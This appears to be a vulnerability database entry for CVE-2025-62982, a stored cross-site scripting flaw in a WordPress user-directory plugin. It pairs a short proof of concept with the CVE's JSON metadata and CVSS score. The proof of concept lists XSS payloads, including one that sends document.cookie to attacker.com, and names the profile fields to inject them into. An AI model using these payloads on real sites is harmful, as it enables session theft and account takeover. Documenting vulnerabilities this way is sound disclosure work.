CVE-2025-62982

// CVE-2025-62982 PoC - WordPress Dynamic User Directory Stored XSS // Target: WordPress site with Dynamic User Directory plugin <= 2.3 // XSS Payload examples: // 1. Basic script injection const payload1 = '<script>alert(document.cookie)</script>'; // 2. Event handler based XSS const payload2 = '<img src=x onerror=alert(String.fromCharCode(88,83,83))>'; // 3. DOM-based XSS using event handlers const payload3 = '<svg/onload=alert(document.domain)>'; // 4. Cookie stealing payload const payload4 = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; // Attacker would inject these payloads into user profile fields: // - User display name // - User bio/description // - Custom directory fields // When other users view the directory listing or user profile, // the malicious script executes in their browser context.

{"cve": {"id": "CVE-2025-62982", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:59.080", "lastModified": "2026-04-27T17:16:39.797", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sarah Giles Dynamic User Directory dynamic-user-directory allows Stored XSS.This issue affects Dynamic User Directory: from n/a through <= 2.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/dynamic-user-directory/vulnerability/wordpress-dynamic-user-directory-plugin-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}